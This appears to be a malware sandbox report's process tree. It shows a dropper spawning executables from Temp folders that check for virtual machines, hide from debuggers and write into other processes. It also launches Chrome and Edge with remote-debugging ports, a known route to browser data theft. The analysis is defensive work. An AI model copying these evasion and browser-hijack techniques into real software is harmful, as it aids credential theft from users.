C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4464,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:88⤵PID:3508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5060 /prefetch:88⤵PID:1352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5056 /prefetch:88⤵PID:5936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5176 /prefetch:88⤵PID:2016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5184 /prefetch:88⤵PID:5772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5316,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5116 /prefetch:28⤵
- Uses browser remote debugging
PID:5932
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:452 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7fff15fa46f8,0x7fff15fa4708,0x7fff15fa47188⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:28⤵PID:3488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:38⤵PID:2580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:88⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2440 /prefetch:28⤵PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:18⤵
- Uses browser remote debugging
PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:18⤵
- Uses browser remote debugging
PID:396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2444 /prefetch:28⤵PID:400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3340 /prefetch:28⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4172 /prefetch:28⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4172 /prefetch:28⤵PID:5372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3892 /prefetch:28⤵PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3588 /prefetch:28⤵PID:1352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15144404374624148122,17001729408256994366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3608 /prefetch:28⤵PID:5240
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 9686⤵
- Program crash
PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe"C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\10098500101\6e7f5c2047.exe"C:\Users\Admin\AppData\Local\Temp\10098500101\6e7f5c2047.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\10098510101\4klgwMz.exe"C:\Users\Admin\AppData\Local\Temp\10098510101\4klgwMz.exe"5⤵
- Executes dropped EXE
PID:5704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2r6275.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2r6275.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\8I3X3EA1A40B3S1KC14QDE1AWC5.exe"C:\Users\Admin\AppData\Local\Temp\8I3X3EA1A40B3S1KC14QDE1AWC5.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f65O.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3f65O.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffefdeacc40,0x7ffefdeacc4c,0x7ffefdeacc584⤵PID:3492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1792 /prefetch:24⤵PID:2212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2184,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:34⤵PID:4508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2528 /prefetch:84⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:14⤵
- Uses browser remote debugging
PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:14⤵
- Uses browser remote debugging
PID:3412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4572,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:84⤵PID:4920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4468,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:14⤵
- Uses browser remote debugging
PID:4412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4636 /prefetch:84⤵PID:3948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4260,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4228 /prefetch:84⤵PID:2352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4720,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:84⤵PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:84⤵PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:84⤵PID:4848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5148,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4436 /prefetch:84⤵PID:3704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5280 /prefetch:84⤵PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4772,i,10618354662937511734,8194432783057538962,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:24⤵
- Uses browser remote debugging
PID:5764
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5524 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffefdcb46f8,0x7ffefdcb4708,0x7ffefdcb47184⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1932 /prefetch:24⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2412 /prefetch:24⤵PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:84⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2800 /prefetch:24⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:14⤵
- Uses browser remote debugging
PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:14⤵
- Uses browser remote debugging
PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,15883184040657101093,7025044625021129797,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2796 /prefetch:24⤵PID:3296
-
-
